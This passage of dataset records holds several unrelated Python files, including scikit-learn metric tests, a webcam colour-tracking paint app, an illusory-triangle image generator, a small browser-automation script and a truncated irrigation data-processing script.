trivial_pred = np.ones(y_true.shape)\n fpr, tpr, thresholds = roc_curve(y_true, trivial_pred)\n roc_auc = auc(fpr, tpr)\n assert_array_almost_equal(roc_auc, 0.50, decimal=2)\n\n # always predict zero\n trivial_pred = np.zeros(y_true.shape)\n fpr, tpr, thresholds = roc_curve(y_true, trivial_pred)\n roc_auc = auc(fpr, tpr)\n assert_array_almost_equal(roc_auc, 0.50, decimal=2)\n\n # hard decisions\n fpr, tpr, thresholds = roc_curve(y_true, pred)\n roc_auc = auc(fpr, tpr)\n assert_array_almost_equal(roc_auc, 0.74, decimal=2)\n\n\ndef test_auc():\n \"\"\"Test Area Under Curve (AUC) computation\"\"\"\n x = [0, 1]\n y = [0, 1]\n assert_array_almost_equal(auc(x, y), 0.5)\n x = [1, 0]\n y = [0, 1]\n assert_array_almost_equal(auc(x, y), 0.5)\n x = [0, 1]\n y = [1, 1]\n assert_array_almost_equal(auc(x, y), 1)\n x = [0, 0.5, 1]\n y = [0, 0.5, 1]\n assert_array_almost_equal(auc(x, y), 0.5)\n\n\ndef test_auc_duplicate_values():\n \"\"\"Test Area Under Curve (AUC) computation with duplicate values\n\n auc() was previously sorting the x and y arrays according to the indices\n from numpy.argsort(x), which was reordering the tied 0's in this example\n and resulting in an incorrect area computation. This test detects the\n error.\n \"\"\"\n x = [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.5, 1.]\n y = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9,\n 1., 1., 1., 1., 1., 1., 1., 1.]\n assert_array_almost_equal(auc(x, y), 1.)\n\n\ndef test_precision_recall_f1_score_binary():\n \"\"\"Test Precision Recall and F1 Score for binary classification task\"\"\"\n y_true, y_pred, _ = make_prediction(binary=True)\n\n # detailed measures for each class\n p, r, f, s = precision_recall_fscore_support(y_true, y_pred, average=None)\n assert_array_almost_equal(p, [0.73, 0.75], 2)\n assert_array_almost_equal(r, [0.76, 0.72], 2)\n assert_array_almost_equal(f, [0.75, 0.74], 2)\n assert_array_equal(s, [25, 25])\n\n # individual scoring function that can be used for grid search: in the\n # binary class case the score is the value of the measure for the positive\n # class (e.g. 
label == 1)\n ps = precision_score(y_true, y_pred)\n assert_array_almost_equal(ps, 0.75, 2)\n\n rs = recall_score(y_true, y_pred)\n assert_array_almost_equal(rs, 0.72, 2)\n\n fs = f1_score(y_true, y_pred)\n assert_array_almost_equal(fs, 0.74, 2)\n\n\ndef test_confusion_matrix_binary():\n \"\"\"Test confusion matrix - binary classification case\"\"\"\n y_true, y_pred, _ = make_prediction(binary=True)\n\n cm = confusion_matrix(y_true, y_pred)\n assert_array_equal(cm, [[19, 6], [7, 18]])\n\n tp = cm[0, 0]\n tn = cm[1, 1]\n fp = cm[0, 1]\n fn = cm[1, 0]\n num = (tp * tn - fp * fn)\n den = np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))\n if den == 0.:\n true_mcc = 0\n else:\n true_mcc = num / den\n mcc = matthews_corrcoef(y_true, y_pred)\n assert_array_almost_equal(mcc, true_mcc, decimal=2)\n assert_array_almost_equal(mcc, 0.48, decimal=2)\n\n\ndef test_precision_recall_f1_score_multiclass():\n \"\"\"Test Precision Recall and F1 Score for multiclass classification task\"\"\"\n y_true, y_pred, _ = make_prediction(binary=False)\n\n # compute scores with default labels introspection\n p, r, f, s = precision_recall_fscore_support(y_true, y_pred, average=None)\n assert_array_almost_equal(p, [0.82, 0.55, 0.47], 2)\n assert_array_almost_equal(r, [0.92, 0.17, 0.90], 2)\n assert_array_almost_equal(f, [0.87, 0.26, 0.62], 2)\n assert_array_equal(s, [25, 30, 20])\n\n # averaging tests\n ps = precision_score(y_true, y_pred, pos_label=1, average='micro')\n assert_array_almost_equal(ps, 0.61, 2)\n\n rs = recall_score(y_true, y_pred, average='micro')\n assert_array_almost_equal(rs, 0.61, 2)\n\n fs = f1_score(y_true, y_pred, average='micro')\n assert_array_almost_equal(fs, 0.61, 2)\n\n ps = precision_score(y_true, y_pred, average='macro')\n assert_array_almost_equal(ps, 0.62, 2)\n\n rs = recall_score(y_true, y_pred, average='macro')\n assert_array_almost_equal(rs, 0.66, 2)\n\n fs = f1_score(y_true, y_pred, average='macro')\n assert_array_almost_equal(fs, 0.58, 2)\n\n ps = precision_score(y_true, y_pred, average='weighted')\n assert_array_almost_equal(ps, 0.62, 2)\n\n rs = recall_score(y_true, y_pred, average='weighted')\n assert_array_almost_equal(rs, 0.61, 2)\n\n fs = f1_score(y_true, y_pred, average='weighted')\n assert_array_almost_equal(fs, 0.55, 2)\n\n # same prediction but with and explicit label ordering\n p, r, f, s = precision_recall_fscore_support(\n y_true, y_pred, labels=[0, 2, 1], average=None)\n assert_array_almost_equal(p, [0.82, 0.47, 0.55], 2)\n assert_array_almost_equal(r, [0.92, 0.90, 0.17], 2)\n assert_array_almost_equal(f, [0.87, 0.62, 0.26], 2)\n assert_array_equal(s, [25, 20, 30])\n\n\ndef test_zero_precision_recall():\n \"\"\"Check that pathological cases do not bring NaNs\"\"\"\n\n try:\n old_error_settings = np.seterr(all='raise')\n\n y_true = np.array([0, 1, 2, 0, 1, 2])\n y_pred = np.array([2, 0, 1, 1, 2, 0])\n\n assert_almost_equal(precision_score(y_true, y_pred,\n average='weighted'), 0.0, 2)\n assert_almost_equal(recall_score(y_true, y_pred, average='weighted'),\n 0.0, 2)\n assert_almost_equal(f1_score(y_true, y_pred, average='weighted'),\n 0.0, 2)\n\n finally:\n np.seterr(**old_error_settings)\n\n\ndef test_confusion_matrix_multiclass():\n \"\"\"Test confusion matrix - multi-class case\"\"\"\n y_true, y_pred, _ = make_prediction(binary=False)\n\n # compute confusion matrix with default labels introspection\n cm = confusion_matrix(y_true, y_pred)\n assert_array_equal(cm, [[23, 2, 0],\n [5, 5, 20],\n [0, 2, 18]])\n\n # compute confusion matrix with explicit label ordering\n 
cm = confusion_matrix(y_true, y_pred, labels=[0, 2, 1])\n assert_array_equal(cm, [[23, 0, 2],\n [0, 18, 2],\n [5, 20, 5]])\n\n\ndef test_classification_report():\n \"\"\"Test performance report\"\"\"\n iris = datasets.load_iris()\n y_true, y_pred, _ = make_prediction(dataset=iris, binary=False)\n\n # print classification report with class names\n expected_report = \"\"\"\\\n precision recall f1-score support\n\n setosa 0.82 0.92 0.87 25\n versicolor 0.56 0.17 0.26 30\n virginica 0.47 0.90 0.62 20\n\navg / total 0.62 0.61 0.56 75\n\"\"\"\n report = classification_report(\n y_true, y_pred, labels=range(len(iris.target_names)),\n target_names=iris.target_names)\n assert_equal(report, expected_report)\n\n # print classification report with label detection\n expected_report = \"\"\"\\\n precision recall f1-score support\n\n 0 0.82 0.92 0.87 25\n 1 0.56 0.17 0.26 30\n 2 0.47 0.90 0.62 20\n\navg / total 0.62 0.61 0.56 75\n\"\"\"\n report = classification_report(y_true, y_pred)\n assert_equal(report, expected_report)\n\n\ndef test_precision_recall_curve():\n \"\"\"Test Precision-Recall and aread under PR curve\"\"\"\n y_true, _, probas_pred = make_prediction(binary=True)\n\n p, r, thresholds = precision_recall_curve(y_true, probas_pred)\n precision_recall_auc = auc(r, p)\n assert_array_almost_equal(precision_recall_auc, 0.82, 2)\n assert_array_almost_equal(precision_recall_auc,\n average_precision_score(y_true, probas_pred))\n # Smoke test in the case of proba having only one value\n p, r, thresholds = precision_recall_curve(y_true,\n np.zeros_like(probas_pred))\n precision_recall_auc = auc(r, p)\n assert_array_almost_equal(precision_recall_auc, 0.75, 3)\n\n\ndef test_losses():\n \"\"\"Test loss functions\"\"\"\n y_true, y_pred, _ = make_prediction(binary=True)\n n = y_true.shape[0]\n\n assert_equal(zero_one(y_true, y_pred), 13)\n assert_almost_equal(mean_squared_error(y_true, y_pred), 12.999 / n, 2)\n assert_almost_equal(mean_squared_error(y_true, y_true), 0.00, 2)\n\n assert_almost_equal(explained_variance_score(y_true, y_pred), -0.04, 2)\n assert_almost_equal(explained_variance_score(y_true, y_true), 1.00, 2)\n\n assert_almost_equal(r2_score(y_true, y_pred), -0.04, 2)\n assert_almost_equal(r2_score(y_true, y_true), 1.00, 2)\n\n\ndef test_losses_at_limits():\n # test limit cases\n assert_almost_equal(mean_squared_error([0.], [0.]), 0.00, 2)\n assert_almost_equal(explained_variance_score([0.], [0.]), 1.00, 2)\n assert_almost_equal(r2_score([0., 1], [0., 1]), 1.00, 2)\n\n\ndef test_r2_one_case_error():\n # test whether r2_score raises error given one point\n assert_raises(ValueError, r2_score, [0], [0])\n\n\ndef test_symmetry():\n \"\"\"Test the symmetry of score and loss functions\"\"\"\n y_true, y_pred, _ = make_prediction(binary=True)\n\n # symmetric\n assert_equal(zero_one(y_true, y_pred),\n zero_one(y_pred, y_true))\n assert_almost_equal(mean_squared_error(y_true, y_pred),\n mean_squared_error(y_pred, y_true))\n # not symmetric\n assert_true(explained_variance_score(y_true, y_pred) != \\\n explained_variance_score(y_pred, y_true))\n assert_true(r2_score(y_true, y_pred) != \\\n r2_score(y_pred, y_true))\n # FIXME: precision and recall aren't symmetric either\n\n\ndef test_hinge_loss_binary():\n y_true = np.array([-1, 1, 1, -1])\n pred_decision = np.array([-8.5, 0.5, 1.5, -0.3])\n assert_equal(1.2 / 4, hinge_loss(y_true, pred_decision))\n\n y_true = np.array([0, 2, 2, 0])\n pred_decision = np.array([-8.5, 0.5, 1.5, -0.3])\n assert_equal(1.2 / 4,\n hinge_loss(y_true, pred_decision, pos_label=2, 
neg_label=0))\n","repo_name":"jkitzes/batid","sub_path":"src/xsklearn/metrics/tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":13916,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"31220232283","text":"import pyautogui as robot\nimport time\n#pyautogui.moveTo(X, Y, Seconds)\n\nlista_canciones=['eamon','vocales']\ngoogle=123,44\nmax=1308,13\ndireccion=179,52\nbuscar=372,130\ncancion=467,290\nexit=1347,11\n\n\n\n#function to open (click) a screen position\ndef abrir(pos,click=1):\n    robot.moveTo(pos)\n    robot.click(clicks=click)\n\n#open chrome\nabrir(google,click=2)\n\n#set the window size\ntime.sleep(2)\nrobot.hotkey(\"alt\",\"space\")\ntime.sleep(0.5)\nrobot.typewrite(\"x\")\n\n#focus the address bar\ntime.sleep(4)\nabrir(direccion)\nrobot.typewrite(\"www.youtube.com\")\nrobot.hotkey(\"enter\")\ntime.sleep(4)\n\n#pick a song\n\nfor i in range(len(lista_canciones)):\n    abrir(buscar,click=3)\n    robot.typewrite(lista_canciones[i])\n    robot.hotkey(\"enter\")\n    time.sleep(2)\n    abrir(cancion)\n    time.sleep(5)\n\nabrir(exit)\nprint(\"Finish\")\n\n\n\n\n\n\n\n\n\n","repo_name":"gvielza/rpa-python-musica","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30244862488","text":"import pandas as pd\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom time import sleep\r\nfrom datetime import datetime\r\nfrom PIL import Image\r\nimport os\r\nimport numpy as np\r\n\r\nstarttime = datetime.now()\r\nRegion = \"LA\"\r\ninputfile = f'{Region}_lat_long.xlsx'\r\noutputfolder = f'D:\\\\Maps\\\\{Region}\\\\'\r\nresult_df = []\r\noutputfile = outputfolder + f'{Region}_lat_long_filtered.xlsx'\r\nlat_long = pd.read_excel(inputfile)\r\nlat = lat_long['Latitude'].values.tolist()\r\nlon = lat_long['Longitude'].values.tolist()\r\nfor i in range(len(lat)):\r\n    try:\r\n        apple_image = outputfolder + f'({lat[i]}{lon[i]})apple_image.png'\r\n        google_image = outputfolder + f'({lat[i]}{lon[i]})google_image.png'\r\n        # sleep(5)\r\n        print(apple_image)\r\n        print(google_image)\r\n        img = Image.open(apple_image)\r\n        img = img.convert(\"RGB\")\r\n        co_ordinates = [(59, 13), (59, 19), (108,13), (108,19), (113, 13), (113, 19), (124,15)]\r\n        flag = False\r\n        for co_ordinate in co_ordinates:\r\n            co_ordinate_tuple = img.getpixel(co_ordinate)\r\n            if co_ordinate_tuple != (72, 69, 65):\r\n                flag = True\r\n                break\r\n\r\n        print(flag)\r\n        if flag == True:\r\n            os.remove(apple_image)\r\n            os.remove(google_image)\r\n        else:\r\n            temp = pd.DataFrame({'Latitude': str(lat[i]), 'Longitude': str(lon[i])}, index=[0])\r\n            result_df.append(temp)\r\n    except:\r\n        continue\r\nif len(result_df) > 0:\r\n    result_df = pd.concat(result_df, ignore_index=True)\r\n    result_df.insert(loc=0, column='S.No', value=np.arange(1, len(result_df) + 1))\r\n    result_df.to_excel(outputfile, index=False)\r\n# driver.quit()\r\nendtime = datetime.now()\r\ndiff = endtime - starttime\r\nprint(diff.seconds)","repo_name":"rrakzz/Maps","sub_path":"applemaps_extraction_images.py","file_name":"applemaps_extraction_images.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"12036362847","text":"import numpy as np\nimport cv2\nfrom collections import deque\n\n# Trackbar callback function\ndef setValues(x):\n    print(\"\")\n\n\n# Create the trackbars needed to tune the marker colour\ncv2.namedWindow(\"Color detectors\")\ncv2.createTrackbar(\"Upper Hue\", \"Color detectors\", 153, 180,setValues)\ncv2.createTrackbar(\"Upper Saturation\", \"Color detectors\", 255, 255,setValues)\ncv2.createTrackbar(\"Upper Value\", \"Color detectors\", 255, 255,setValues)\ncv2.createTrackbar(\"Lower Hue\", \"Color detectors\", 64, 180,setValues)\ncv2.createTrackbar(\"Lower Saturation\", \"Color detectors\", 72, 255,setValues)\ncv2.createTrackbar(\"Lower Value\", \"Color detectors\", 49, 255,setValues)\n\n\n# Separate arrays to handle the coloured points of each colour\nbpoints = [deque(maxlen=1024)]\ngpoints = [deque(maxlen=1024)]\nrpoints = [deque(maxlen=1024)]\nypoints = [deque(maxlen=1024)]\n\n# These indices mark the points in the array of each specific colour\nblue_index = 0\ngreen_index = 0\nred_index = 0\nyellow_index = 0\n\n# Kernel used for dilation \nkernel = np.ones((5,5),np.uint8)\n\ncolors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (0, 255, 255)]\ncolorIndex = 0\n\n# Canvas setup \npaintWindow = np.zeros((471,636,3)) + 255\npaintWindow = cv2.rectangle(paintWindow, (40,1), (140,65), (0,0,0), 2)\npaintWindow = cv2.rectangle(paintWindow, (160,1), (255,65), colors[0], -1)\npaintWindow = cv2.rectangle(paintWindow, (275,1), (370,65), colors[1], -1)\npaintWindow = cv2.rectangle(paintWindow, (390,1), (485,65), colors[2], -1)\npaintWindow = cv2.rectangle(paintWindow, (505,1), (600,65), colors[3], -1)\n\ncv2.putText(paintWindow, \"CLEAR\", (49, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 2, cv2.LINE_AA)\ncv2.putText(paintWindow, \"BLUE\", (185, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\ncv2.putText(paintWindow, \"GREEN\", (298, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\ncv2.putText(paintWindow, \"RED\", (420, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\ncv2.putText(paintWindow, \"YELLOW\", (520, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (150,150,150), 2, cv2.LINE_AA)\ncv2.namedWindow('Paint', cv2.WINDOW_AUTOSIZE)\n\n\n# Camera\ncap = cv2.VideoCapture(0)\n\n\nwhile True:\n    # Read a frame from the camera\n    ret, frame = cap.read()\n    # Flip the frame so it mirrors the user\n    frame = cv2.flip(frame, 1)\n    hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n\n    u_hue = cv2.getTrackbarPos(\"Upper Hue\", \"Color detectors\")\n    u_saturation = cv2.getTrackbarPos(\"Upper Saturation\", \"Color detectors\")\n    u_value = cv2.getTrackbarPos(\"Upper Value\", \"Color detectors\")\n    l_hue = cv2.getTrackbarPos(\"Lower Hue\", \"Color detectors\")\n    l_saturation = cv2.getTrackbarPos(\"Lower Saturation\", \"Color detectors\")\n    l_value = cv2.getTrackbarPos(\"Lower Value\", \"Color detectors\")\n    Upper_hsv = np.array([u_hue,u_saturation,u_value])\n    Lower_hsv = np.array([l_hue,l_saturation,l_value])\n\n\n    # Add the colour buttons to the live frame for colour access\n    frame = cv2.rectangle(frame, (40,1), (140,65), (122,122,122), -1)\n    frame = cv2.rectangle(frame, (160,1), (255,65), colors[0], -1)\n    frame = cv2.rectangle(frame, (275,1), (370,65), colors[1], -1)\n    frame = cv2.rectangle(frame, (390,1), (485,65), colors[2], -1)\n    frame = cv2.rectangle(frame, (505,1), (600,65), colors[3], -1)\n    cv2.putText(frame, \"CLEAR ALL\", (49, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\n    cv2.putText(frame, \"BLUE\", (185, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\n    cv2.putText(frame, \"GREEN\", (298, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\n    cv2.putText(frame, \"RED\", (420, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\n    cv2.putText(frame, \"YELLOW\", (520, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (150,150,150), 2, cv2.LINE_AA)\n\n\n    # Identify the pointer by building its mask\n    Mask = cv2.inRange(hsv, Lower_hsv, Upper_hsv)\n    Mask = cv2.erode(Mask, kernel, iterations=1)\n    Mask = cv2.morphologyEx(Mask, cv2.MORPH_OPEN, kernel)\n    Mask = cv2.dilate(Mask, kernel, iterations=1)\n\n    # Find contours for the pointer once it has been identified\n    cnts,_ = cv2.findContours(Mask.copy(), cv2.RETR_EXTERNAL,\n    \tcv2.CHAIN_APPROX_SIMPLE)\n    center = None\n\n    # If any contours were formed\n    if len(cnts) > 0:\n    \t# sort the contours to find the largest one\n        cnt = sorted(cnts, key = cv2.contourArea, reverse = True)[0]\n        # Get the radius of the enclosing circle around the found contour\n        ((x, y), radius) = cv2.minEnclosingCircle(cnt)\n        # Draw the circle around the contour\n        cv2.circle(frame, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n        # Compute the centre of the detected contour\n        M = cv2.moments(cnt)\n        center = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))\n\n        # Check whether the user wants to click any button above the screen\n        if center[1] <= 65:\n            if 40 <= center[0] <= 140: # Clear\n                bpoints = [deque(maxlen=512)]\n                gpoints = [deque(maxlen=512)]\n                rpoints = [deque(maxlen=512)]\n                ypoints = [deque(maxlen=512)]\n\n                blue_index = 0\n                green_index = 0\n                red_index = 0\n                yellow_index = 0\n\n                paintWindow[67:,:,:] = 255\n            elif 160 <= center[0] <= 255:\n                    colorIndex = 0 # Blue\n            elif 275 <= center[0] <= 370:\n                    colorIndex = 1 # Green\n            elif 390 <= center[0] <= 485:\n                    colorIndex = 2 # Red\n            elif 505 <= center[0] <= 600:\n                    colorIndex = 3 # Yellow \n        else :\n            if colorIndex == 0:\n                bpoints[blue_index].appendleft(center)\n            elif colorIndex == 1:\n                gpoints[green_index].appendleft(center)\n            elif colorIndex == 2:\n                rpoints[red_index].appendleft(center)\n            elif colorIndex == 3:\n                ypoints[yellow_index].appendleft(center)\n    \n# Append the next deques when nothing is detected, to avoid mixing strokes\n    else:\n        bpoints.append(deque(maxlen=512))\n        blue_index += 1\n        gpoints.append(deque(maxlen=512))\n        green_index += 1\n        rpoints.append(deque(maxlen=512))\n        red_index += 1\n        ypoints.append(deque(maxlen=512))\n        yellow_index += 1\n\n    # Draw the lines \n    points = [bpoints, gpoints, rpoints, ypoints]\n    for i in range(len(points)):\n        for j in range(len(points[i])):\n            for k in range(1, len(points[i][j])):\n                if points[i][j][k - 1] is None or points[i][j][k] is None:\n                    continue\n                cv2.line(frame, points[i][j][k - 1], points[i][j][k], colors[i], 2)\n                cv2.line(paintWindow, points[i][j][k - 1], points[i][j][k], colors[i], 2)\n\n    # Show the windows \n    cv2.imshow(\"Tracking\", frame)\n    cv2.imshow(\"Paint\", paintWindow)\n    cv2.imshow(\"mask\",Mask)\n\n\t# Press the \"c\" key to close the program \n    if cv2.waitKey(1) & 0xFF == ord(\"c\"):\n        break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Lordcode2k18/The-practical-part-of-the-bachelor-s-thesis","sub_path":"dyplom.py","file_name":"dyplom.py","file_ext":"py","file_size_in_byte":8124,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"12396231044","text":"import sys\nimport numpy as np\nfrom scipy.stats import beta\nfrom scipy.ndimage import gaussian_filter\nfrom 
matplotlib.path import Path as mpath\n\n# s = 2 sqrt(3) r\n# h = sqrt(3)/2 s\n# h = 3r\n\ndef make(n, side_len, circ_rad, theta, ishift=0, jshift=0,\n         sigma_smooth=0., sigma_noise=0., rs=None):\n    \"\"\"\n    Create an illusory triangle contour [1] image with random\n    size and orientation.\n\n    [1]: https://en.wikipedia.org/wiki/Illusory_contours\n\n    Parameters\n    ----------\n    n: int\n        Image shape will be (n,n)\n\n    side_len: float\n        Side length of the triangle in pixels.\n\n    circ_rad: float\n        Radius of the circles at the vertices\n        of the triangle in pixels.\n\n    theta: float (radians)\n        Rotation of the triangle. Zero points the triangle to the right.\n\n    ishift,jshift: integers\n        Translate the center of the triangle by ishift and jshift.\n\n    sigma_smooth: float\n        Gaussian smoothing parameter (make image borders more diffuse).\n\n    sigma_noise: float\n        Additive noise amplitude.\n\n    rs: numpy.random.RandomState, default=None\n        Include for reproducible results.\n    \"\"\"\n    if circ_rad > 0.5*side_len:\n        raise ValueError((\"Circle radius should be less \"\n                          \"than one half the side length.\"))\n\n    # Triangle height.\n    height = 0.5*np.sqrt(3)*side_len\n\n    # Distance from center of triangle to a vertex.\n    tri_rad = (2.0/3.0)*height\n\n    # Rotation factor for triangle vertices.\n    w = (2.0/3.0)*np.pi\n\n    # Get extent of triangle plus outer circles for validation.\n    extent = np.zeros((3,2))\n    for i in range(3):\n        x = (tri_rad+circ_rad)*np.cos(i*w+theta) + n/2 + jshift\n        y = (tri_rad+circ_rad)*np.sin(i*w+theta) + n/2 - ishift\n        extent[i] = n-y,x\n\n    for e in extent:\n        if e[0] < 0 or e[0] > n-1:\n            raise ValueError((\"Extent of triangle plus circles exceeds \"\n                              \"image dimensions along axis 0.\"))\n        if e[1] < 0 or e[1] > n-1:\n            raise ValueError((\"Extent of triangle plus circles exceeds \"\n                              \"image dimensions along axis 1.\"))\n\n    vertices = np.zeros((3,2))\n    for i in range(3):\n        x = tri_rad*np.cos(i*w+theta) + n/2 + jshift\n        y = tri_rad*np.sin(i*w+theta) + n/2 - ishift\n        vertices[i] = n-y,x\n\n    tri_path = mpath(np.append(vertices, vertices[-1].reshape(1,2), axis=0),\n                     codes=[mpath.MOVETO, mpath.LINETO,\n                            mpath.LINETO, mpath.CLOSEPOLY])\n\n    ii,jj = np.indices((n,n))\n    coords = np.c_[ii.flatten(), jj.flatten()]\n\n    triangle = tri_path.contains_points(coords).reshape(n,n)\n\n    ucircle = mpath.unit_circle()\n    circles = np.zeros((n,n), dtype=bool)\n\n    for v in vertices:\n        circle = mpath(vertices=ucircle.vertices*circ_rad + v,\n                       codes=ucircle.codes)\n        circles = np.logical_or(circles,\n                                circle.contains_points(coords).reshape(n,n))\n    \n    image = (~np.logical_and(circles, ~triangle)).astype(float)\n    rs = rs if rs is not None else np.random.RandomState()\n\n    if sigma_smooth > 0:\n        image = gaussian_filter(image, sigma_smooth)\n\n    if sigma_noise > 0:\n        image += sigma_noise*rs.randn(n,n)\n\n    return image, triangle\n\ndef make_dataset(N, n=101, slen=[40,60], crad=[10,20],\n                 shift=[-0, 0], nsig=[0.05,0.15], ssig=[1,1],\n                 theta=[0,2*np.pi/3], random_state=None, verbose=True):\n    \"\"\"\n    Make a randomly generated dataset of illusory triangle data.\n\n    Parameters\n    ----------\n    N: int\n        The number of examples.\n\n    n: int\n        The image size.\n\n    slen: list, len=2\n        Interval of triangle side lengths from which to sample.\n\n    crad: list, len=2\n        Interval of circle radii from which to sample.\n\n    shift: list, len=2\n        The interval of shift values from which to sample.\n\n    nsig: list, len=2\n        The interval of values from which to sample `sigma_noise`. 
\n\n    ssig: list, len=2\n        The interval of values from which to sample `sigma_smooth`. \n\n    theta: list, len=2\n        The interval of values from which to sample `theta`.\n\n    random_state: numpy.random.RandomState, default=None\n        Include for reproducible results.\n\n    verbose: bool, default=True\n        Print progress.\n    \"\"\"\n    random_state = random_state if random_state is not None else np.random.RandomState()\n    def betarvs(**kwargs):\n        return beta.rvs(3, 3, random_state=random_state, **kwargs)\n\n    if verbose:\n        q = len(str(N))\n        pstr = \"Creating dataset ... %%0%dd / %d\" % (q,N)\n\n    imgs = np.zeros((N, n, n))\n    segs = np.zeros((N, n, n), dtype=bool)\n\n    i = 0\n\n    while i < N:\n        try:\n            sl = betarvs(loc=slen[0],scale=slen[1]-slen[0])\n            cr = betarvs(loc=crad[0],scale=crad[1]-crad[0])\n\n            ishift,jshift = betarvs(loc=shift[0],\n                                    scale=shift[1]-shift[0], size=2)\n            th = betarvs(loc=theta[0],scale=theta[1]-theta[0])\n\n            sigma_noise = betarvs(loc=nsig[0], scale=nsig[1]-nsig[0])\n            sigma_smooth = betarvs(loc=ssig[0], scale=ssig[1]-ssig[0])\n\n            meta = dict(\n                side_len=sl,\n                circ_rad=cr,\n                ishift=ishift,\n                jshift=jshift,\n                theta=th,\n                sigma_smooth=sigma_smooth,\n                sigma_noise=sigma_noise\n            )\n\n            img,seg = make(n, sl, cr, th, ishift, jshift,\n                           sigma_smooth, sigma_noise, rs=random_state)\n            imgs[i] = img\n            segs[i] = seg\n            i+=1\n\n            if verbose: print(pstr % i)\n        except ValueError:\n            continue\n    return imgs, segs\n","repo_name":"notmatthancock/level-set-machine-learning","sub_path":"lsml/data/dim2/gestalt_triangle.py","file_name":"gestalt_triangle.py","file_ext":"py","file_size_in_byte":5907,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"}
+{"seq_id":"1845117548","text":"from const import *\nfrom buff import *\n\ndef init(self, mode = True):\n    self.name = \"伊瓦尔之书\"\n    self.description = \"随机召唤一个法师。\"\n    self.original = False\n    self.typ = CARD_SPELL\n    self.subtype = [SUBTYPE_BOOK]\n    self.originalcost = [0, 0, 2, 0, 0, 0] #White Fire Water Tree Light Death\n    \n    if mode:\n        self.cost = self.originalcost.copy()\n        self.needtarget = False\n        \n        buff = Buff(self.system, \"b0000000024_000\", self, self)\n        self.add_buff(buff)\n    \n\n\n    \n","repo_name":"zblcm/python-StoneAsh","sub_path":"server/cards/c0000000024.py","file_name":"c0000000024.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1449238386","text":"import torch.nn as nn\nfrom .utils import named2dim_tensor\n\nclass QModule(nn.Module):\n    def get_named_tensor(self, name):\n        if '_parameters' in self.__dict__:\n            _parameters = self.__dict__['_parameters']\n            if name in _parameters:\n                return _parameters[name]\n        if '_buffers' in self.__dict__:\n            _buffers = self.__dict__['_buffers']\n            if name in _buffers:\n                return _buffers[name]\n        return None\n\n    def __getattr__(self, name):\n        tensor = self.get_named_tensor(name)\n        if tensor is not None:\n            if not hasattr(self, \"_platedims\"):\n                raise Exception(\"Cannot return parameter or buffer, as self._platedims is not set. 
To set self._platedims, you need to pass Q to a Model.\")\n            return named2dim_tensor(self._platedims, tensor)\n        else:\n            return super().__getattr__(name)\n\n","repo_name":"ThomasHeap/MPRW-S","sub_path":"alan/qmodule.py","file_name":"qmodule.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"28774470890","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"\nHey Katie\n\nI’d be keen to know the percentage of data, as well as days of data (>90%), available for each WAP that should be reported (>5l/s) for all consents associated with Irrigation schemes?\n\nThanks, Eila\n\"\"\"\n\n\"\"\"\nCreated on Wed Sep  4 10:00:52 2019\n\n@author: KatieSi\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport pdsql\nfrom datetime import datetime, timedelta\n\n\nTelemetryFromDate = '2018-07-01'\nTelemetryToDate = '2019-06-30'\n\nBaseline = pd.read_csv(r\"D:\\\\Implementation Support\\\\Python Scripts\\\\scripts\\\\Segmentation2019\\\\Baseline.csv\")\n\nIrrigation = pd.read_csv(r\"D:\\\\Implementation Support\\\\Python Scripts\\\\scripts\\\\Import\\\\IrrigationSchemes.csv\")\nIrrigation['Activity'] = Irrigation['Activity'].str.strip().str.lower()\n\nIrrigation = pd.merge(Irrigation, Baseline, on = ['ConsentNo','WAP', 'Activity'], how = 'left')\n\n\nIrrigation = Irrigation[[\n                 'Organisation',\n                 'ConsentNo',\n                 'Activity',\n                 'WAP',\n                 'WellStatus', \n                 'Waiver', \n                 'WAPsOnConsent',\n                 'ConsentsOnWAP',\n                 'WAPRate', \n                 'T_DaysOfData'\n                 ]]\n\nIrrigation = Irrigation.drop_duplicates()\nIrrigation[['T_DaysOfData']] = 